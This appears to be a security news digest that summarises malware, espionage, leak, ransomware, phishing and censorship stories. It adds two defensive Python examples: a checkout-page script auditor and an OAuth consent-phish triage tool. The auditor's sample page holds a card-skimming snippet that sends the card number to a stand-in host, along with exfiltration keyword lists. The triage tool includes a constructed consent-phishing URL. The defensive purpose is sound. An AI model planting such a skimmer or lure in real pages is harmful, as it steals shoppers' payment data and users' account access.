Table of Contents

  1. Malware
    1. Fake U.S. Dept of Treasury emails spread new Node.js malware
    2. This Service Helps Malware Authors Fix Flaws in their Code
    3. FBI warns about attacks on Magento online stores via old plugin vulnerability
  2. Politics
    1. Russian hackers tracked Ukrainian artillery units using Android implant
    2. F.B.I. Finds Links Between Pensacola Gunman and Al-Qaeda
    3. YouTube Automatically Deletes Some Terms Critical of Chinese Regime
  3. Leaks
    1. Mercedes-Benz onboard logic unit (OLU) source code leaks online
  4. Ransomware
    1. REvil Ransomware found buyer for Trump data, now targeting Madonna
  5. Phishing
    1. MFA Bypass Phish Caught: OAuth2 Grants Access to User Data Without a Password
  6. Digital rights
    1. Evidence of Twitter, Periscope and Zoom restrictions in Pakistan

Malware

Fake U.S. Dept of Treasury emails spread new Node.js malware

A new Node.js based remote access Trojan and password-stealing malware is being distributed through malicious emails pretending to be from the U.S. Department of the Treasury. This new spam campaign was discovered by Abuse.ch. The email claims that payment for a government contract was not made due to incorrect banking information, prompts the recipient to examine the attached document for mistakes, and warns that if the sender does not hear back, the money will be used for the government's Coronavirus disaster relief.

This Service Helps Malware Authors Fix Flaws in their Code

Almost daily now there is news about flaws in commercial software that lead to computers getting hacked and seeded with malware. But the reality is the most malicious software also has its share of security holes that open the door for security researchers or ne'er-do-wells to liberate or else seize control over already-hacked systems. Here's a look at one long-lived malware vulnerability testing service that is used and run by some of the Dark Web's top cybercriminals.

FBI warns about attacks on Magento online stores via old plugin vulnerability

The FBI says hackers are exploiting a three-year-old vulnerability in a Magento plugin to take over online stores and plant a malicious script that records and steals buyers' payment card data. This type of attack is known as web skimming, e-skimming, or Magecart, and the FBI previously warned about a rise in such attacks in October last year. In this recent campaign, attackers are exploiting CVE-2017-7391, a vulnerability in MAGMI (Magento Mass Import), a plugin for Magento-based online stores, the FBI said in a flash security alert sent to the US private sector at the start of the month.
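Because a web skimmer has to run in the shopper's browser, the injected script is visible in the checkout page itself. The following is an added example, not code from the FBI alert or from Magento or MAGMI: a small inventory check a store operator can run against their own checkout HTML to list every script the page loads, flag external hosts outside an allowlist, and flag inline scripts that both touch card fields and appear to send data off the page. The HTML, hostnames and allowlist are constructed sample data, and the keyword heuristics are assumptions meant as a starting point rather than a definitive detector.

```python
"""Inventory scripts on a checkout page and flag ones that look injected.

Added example (not from the FBI alert or any Magento/MAGMI code). The sample
page, the allowlist and the keyword hints below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist of hosts the store legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}

# Heuristic hints (assumptions): an inline script that references card fields
# AND contains a way to send data elsewhere deserves a human look.
CARD_HINTS = ("cc_number", "card", "cvv", "expir")
EXFIL_HINTS = ("XMLHttpRequest", "fetch(", "sendBeacon", "new Image", ".src=")

# Constructed sample checkout page: two legitimate scripts, one third-party
# script from an unknown host, and one inline snippet watching the card field.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/lib/jquery.js"></script>
<script src="https://stats.not-our-cdn.example/track.js"></script>
<script>
  document.querySelector('#cc_number').addEventListener('change', function (e) {
    new Image().src = 'https://stats.not-our-cdn.example/c?d=' + btoa(e.target.value);
  });
</script>
</head><body><form id="checkout"><input id="cc_number"></form></body></html>
"""


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # text of <script> ... </script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # html.parser delivers <script> content via handle_data
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return the script inventory plus the entries that need review.

    Relative src values are treated as first-party; any absolute or
    protocol-relative src whose host is not allowlisted is reported.
    """
    parser = ScriptCollector()
    parser.feed(html)
    unexpected = set()
    for src in parser.external:
        host = urlparse(src).netloc
        if host and host not in allowed_hosts:
            unexpected.add(host)
    suspicious_inline = [
        s.strip() for s in parser.inline
        if any(h in s for h in CARD_HINTS) and any(h in s for h in EXFIL_HINTS)
    ]
    return {
        "external": parser.external,
        "unexpected_hosts": sorted(unexpected),
        "suspicious_inline": suspicious_inline,
    }


if __name__ == "__main__":
    findings = audit_checkout_page(SAMPLE_CHECKOUT_HTML)
    print("scripts loaded:", findings["external"])
    print("hosts not on allowlist:", findings["unexpected_hosts"])
    print("inline scripts to review:", len(findings["suspicious_inline"]))
```

Run this on a saved copy of the live checkout page on a schedule and alert on any change to the inventory; a Content Security Policy restricted to the allowlisted hosts turns the same list into an enforced control rather than a report.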

Politics

Russian hackers tracked Ukrainian artillery units using Android implant

A hacking group linked to the Russian government and to high-profile cyberattacks against Democrats during the U.S. presidential election likely used a malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016, according to a new report released Thursday. The malware was able to retrieve communications and some location data from infected devices, intelligence that would likely have been used to strike the artillery in support of pro-Russian separatists fighting in eastern Ukraine, the report from cybersecurity firm CrowdStrike found. The findings are the latest to support a growing view among Western security officials and cybersecurity researchers that Russian President Vladimir Putin has increasingly relied on hacking to exert influence and attack geopolitical foes.

F.B.I. Finds Links Between Pensacola Gunman and Al-Qaeda

The gunman in last year's deadly shooting at a military base in Florida was regularly in touch with Al-Qaeda for years, including the night before the attack, the country's top law enforcement officials said on Monday. They also accused Apple of costing them valuable time by refusing to help unlock the gunman's phone. The F.B.I. found that the gunman, Second Lt. Mohammed Saeed Alshamrani, a Saudi Air Force cadet training with the American military in Pensacola, had communicated with leaders of Al-Qaeda in the Arabian Peninsula and had joined the Saudi military to carry out a "special operation," Attorney General William P. Barr said at a news conference.

YouTube Automatically Deletes Some Terms Critical of Chinese Regime

YouTube automatically deletes comments that mention some Chinese phrases commonly used to criticize the Chinese Communist Party (CCP), Chinese netizens have discovered. Comments that contain such phrases are deleted within seconds, which suggests it's the work of YouTube's algorithms. One apparently banned phrase is "gongfei" (共匪), which can be translated as "communist bandit." It seems to date back to the Chinese civil war era. Another phrase that gets deleted is "wumao" (五毛), which literally means "fifty cents" and is commonly used to describe the army of internet trolls the CCP uses to spread its propaganda online. It's rumored the trolls used to be paid around 50 cents per post.

Leaks

Mercedes-Benz onboard logic unit (OLU) source code leaks online

The source code for "smart car" components installed in Mercedes-Benz vans was leaked online over the weekend, ZDNet has learned. The leak occurred after Till Kottmann, a Swiss-based software engineer, discovered a Git web portal belonging to Daimler AG, the German automotive company behind the Mercedes-Benz car brand. Kottmann told ZDNet that he was able to register an account on Daimler's code-hosting portal and then download more than 580 Git repositories containing the source code of onboard logic units (OLUs) installed in Mercedes vans.

Ransomware

REvil Ransomware found buyer for Trump data, now targeting Madonna

The REvil ransomware group claims to have buyers ready for documents containing damaging information about US President Donald Trump and is preparing to auction data on international celebrity Madonna. The hackers breached the network of Grubman Shire Meiselas & Sacks (GSMLaw), a law firm representing a huge number of A-list celebrities, stealing everything they considered of value before encrypting the data. After unfruitful negotiations with the law firm, REvil published an archive "with the most harmless information" on Donald Trump, a collection of more than 160 emails. They also said that there would be an auction every week with customer data, and that they don't care who buys it as long as they get paid.

Phishing

MFA Bypass Phish Caught: OAuth2 Grants Access to User Data Without a Password

The Cofense Phishing Defense Center (PDC) uncovered a phishing tactic that leverages the OAuth2 framework and OpenID Connect (OIDC) protocol to access user data. The phish is not a typical credential harvester, and even if it were, Multi-Factor Authentication (MFA) wouldn't have helped. Instead, it attempts to trick users into granting permissions to a rogue application. This is not the first time the tactic has been observed, but it's a stark reminder that phishing isn't going to be solved by Multi-Factor Authentication. Using the lure of a Q1 bonus, the email is crafted to appear to be a normal invite to a SharePoint hosted file. The prospect of a salary increase is an effective lure that can lead users to fall prey.
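What the victim actually clicks in a consent phish is an ordinary OAuth2 authorization request, so the fields of that request (which client is asking, which scopes it wants, where the code will be sent back) are what a reviewer or an automated mail filter should look at. The block below is an added example, not code from Cofense or from any identity provider: it parses an authorize URL, checks the client_id against an allowlist of apps an administrator has approved, scores the requested scopes against a high-risk set, and checks the redirect host. The sample URLs, client IDs, hostnames and the scope vocabulary are constructed for illustration and should be mapped to the real scope names of the provider in use.

```python
"""Triage an OAuth2/OIDC authorization request for consent-phishing risk.

Added example, not code from Cofense or any identity provider. Every URL,
client_id, host and scope name here is a constructed sample.
"""
from urllib.parse import urlparse, parse_qs

# Constructed allowlist of client_ids an administrator has reviewed and approved.
APPROVED_CLIENT_IDS = {"11111111-1111-1111-1111-111111111111"}

# Constructed allowlist of hosts approved apps may redirect the code to.
TRUSTED_REDIRECT_HOSTS = {"apps.corp.example"}

# Scopes that hand an app persistent or broad access to a user's data.
# Illustrative names (compared case-insensitively); use your provider's own list.
HIGH_RISK_SCOPES = {
    "offline_access",            # refresh token: access outlives the session
    "mail.read", "mail.readwrite", "mail.send",
    "files.read.all", "files.readwrite.all",
    "contacts.read", "user.read.all",
}

# Constructed lure: unknown app asks for mailbox and file access plus a
# refresh token, and wants the code sent to a host nobody has vetted.
SAMPLE_LURE_URL = (
    "https://login.idp.example/oauth2/v2.0/authorize"
    "?client_id=deadbeef-0000-0000-0000-000000000001"
    "&response_type=code"
    "&redirect_uri=https%3A%2F%2Fbonus-review.example%2Fcallback"
    "&scope=openid%20profile%20offline_access%20Mail.Read%20Files.ReadWrite.All"
    "&state=xyz"
)

# Constructed benign request from an approved app asking only for identity scopes.
SAMPLE_APPROVED_URL = (
    "https://login.idp.example/oauth2/v2.0/authorize"
    "?client_id=11111111-1111-1111-1111-111111111111"
    "&response_type=code"
    "&redirect_uri=https%3A%2F%2Fapps.corp.example%2Fcallback"
    "&scope=openid%20profile%20email"
)


def parse_authorize_request(url):
    """Extract the fields that matter for a consent review from an authorize URL."""
    p = urlparse(url)
    q = parse_qs(p.query)
    first = lambda key: q.get(key, [""])[0]
    return {
        "issuer_host": p.netloc,
        "client_id": first("client_id"),
        "response_type": first("response_type"),
        "redirect_uri": first("redirect_uri"),
        "scopes": first("scope").split(),
    }


def assess_consent_request(url, approved=APPROVED_CLIENT_IDS,
                           trusted_redirects=TRUSTED_REDIRECT_HOSTS):
    """Return (level, reasons): level is 'ok', 'review' or 'block'."""
    req = parse_authorize_request(url)
    reasons = []
    unknown_app = req["client_id"] not in approved
    risky = sorted(s for s in req["scopes"] if s.lower() in HIGH_RISK_SCOPES)
    if unknown_app:
        reasons.append(f"client_id {req['client_id'] or '<missing>'} is not an approved app")
    if risky:
        reasons.append("high-risk scopes requested: " + ", ".join(risky))
    redirect_host = urlparse(req["redirect_uri"]).netloc
    if redirect_host and redirect_host not in trusted_redirects:
        reasons.append(f"redirect_uri host {redirect_host} is not trusted")
    if unknown_app and risky:
        level = "block"          # unknown app wanting broad access: classic consent phish
    elif reasons:
        level = "review"
    else:
        level = "ok"
    return level, reasons


if __name__ == "__main__":
    for name, url in (("lure", SAMPLE_LURE_URL), ("approved", SAMPLE_APPROVED_URL)):
        level, reasons = assess_consent_request(url)
        print(f"{name}: {level}")
        for r in reasons:
            print("  -", r)
```

The same three checks map directly onto the tenant-side mitigation: restricting end-user consent so that only pre-approved applications, or only low-risk scopes, can be granted without an administrator review removes the decision from the person who just read an email about a bonus. Periodically listing existing consent grants against the same high-risk scope set catches grants that slipped through before the policy was tightened.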

Digital rights

Evidence of Twitter, Periscope and Zoom restrictions in Pakistan

Network data from the NetBlocks internet observatory confirm that Twitter, Periscope and Zoom were restricted on multiple internet providers in Pakistan on the evening of Sunday 17 May 2020, commencing approximately 18:30 UTC and lasting over an hour. This report, produced in partnership with the Digital Rights Foundation, presents findings on the sequence of events. It is shown that the Zoom restrictions appear technically unrelated to international issues that affected call quality earlier in the day. Further, it is shown that Twitter, Twitter's image and video servers, Twitter's streaming platform Periscope and the Zoom videoconferencing website share the same timeline of disruption, consistent with previously documented social media platform disruptions in Pakistan.